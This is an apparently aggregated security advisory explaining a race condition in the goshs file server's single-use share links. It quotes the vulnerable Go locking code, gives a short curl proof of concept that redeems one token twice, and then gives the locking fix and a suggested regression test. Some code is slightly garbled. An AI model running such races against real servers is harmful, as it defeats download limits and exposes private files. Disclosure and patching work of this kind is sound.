Listen to this Post
How the Vulnerability Works
The vulnerability resides in the `ShareHandler` of goshs, specifically within the token redemption logic for share links. When a share token is created with a `DownloadLimit` (e.g., `limit=1` for a single-use link), the server is expected to allow only that many downloads before invalidating the token. However, the implementation contains a classic Time-of-Check to Time-of-Use (TOCTOU) race condition that allows concurrent requests to bypass this limit.
The handler reads the share token’s `DownloadLimit` and current `Downloaded` count while holding a read lock (RLock). It then releases this lock before serving the actual file content. The critical section of code is in `httpserver/handler.go` between lines 978 and 1008:
fs.sharedLinksMu.RLock()
entry, ok := fs.SharedLinks[bash]
fs.sharedLinksMu.RUnlock() // <-- lock released here
// ... serve file ... // <-- file transfer happens unlocked
fs.sharedLinksMu.Lock() // <-- lock re-acquired only now
current.Downloaded++
if current.Downloaded >= current.DownloadLimit {
delete(fs.SharedLinks, token)
}
fs.sharedLinksMu.Unlock()
Because the lock is released before the file is served and only re-acquired after the transfer completes, multiple concurrent goroutines can interleave during the window between the `RUnlock` and the subsequent Lock. Each goroutine observes the same pre-increment snapshot of `Downloaded` and DownloadLimit, passes the limit check, and proceeds to serve the file. The counter is only incremented after the file has been fully transmitted, meaning all racing requests succeed in redeeming the token.
This flaw effectively nullifies the `DownloadLimit` constraint, turning a supposedly single-use share link into a multi-use one. The issue affects all goshs releases that include the share-link feature, up to and including v2.0.9. The reporter, Nishant Verma, reproduced the issue 5 out of 5 times on a 2026-era M-series Mac, confirming the race condition is reliably triggerable.
DailyCVE Form:
Platform: …….
Version: ……..
Vulnerability :……
Severity: …….
date: ……….
Prediction: ……..
What Undercode Say:
Start goshs server with share-link feature
goshs -p 18000 -d /tmp/r -b admin:pw &
Create a file to share
echo data > /tmp/r/f.txt
Generate a single-use share token (limit=1)
SHARE=$(curl -su admin:pw "http://localhost:18000/f.txt?share&limit=1")
TK=$(echo "$SHARE" | sed -n 's/.token=([^"])"./\1/p')
Attacker races two concurrent redemptions
curl -so /dev/null -w "%{http_code}\n" "http://localhost:18000/?token=$TK" & \
curl -so /dev/null -w "%{http_code}\n" "http://localhost:18000/?token=$TK" & \
wait
Observed: 200 / 200 (both succeed) -> limit=1 redeemed twice
Exploit:
An attacker can intercept or guess a share token (e.g., from mail forwarding, browser history, or logs) and launch multiple concurrent HTTP requests to the share link. Due to the race condition, all requests will be served, exceeding the intended download cap. This can be chained with other token-leak vectors to multiply the exfiltration window.
Protection:
Apply the suggested fix by moving the limit check and counter increment under the write lock before serving the file:
fs.sharedLinksMu.Lock()
entry, ok := fs.SharedLinks[bash]
if !ok || time.Now().After(entry.Expires) ||
(entry.DownloadLimit != -1 && entry.Downloaded >= entry.DownloadLimit) {
fs.sharedLinksMu.Unlock()
http.NotFound(w, r)
return
}
entry.Downloaded++
if entry.DownloadLimit != -1 && entry.Downloaded >= entry.DownloadLimit {
delete(fs.SharedLinks, token)
} else {
fs.SharedLinks[bash] = entry
}
fs.sharedLinksMu.Unlock()
// ... serve file ...
Additionally, add a regression test that races two requests against a `limit=1` token and asserts exactly one `200` response.
Impact:
A “single-use” share intended to deliver a one-shot secret can be redeemed N times by N concurrent clients. This breaks the integrity of download limits and can lead to unauthorized access to sensitive files, especially when combined with token leakage. Operators relying on share links for secure, one-time file delivery will find their access controls silently undermined.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

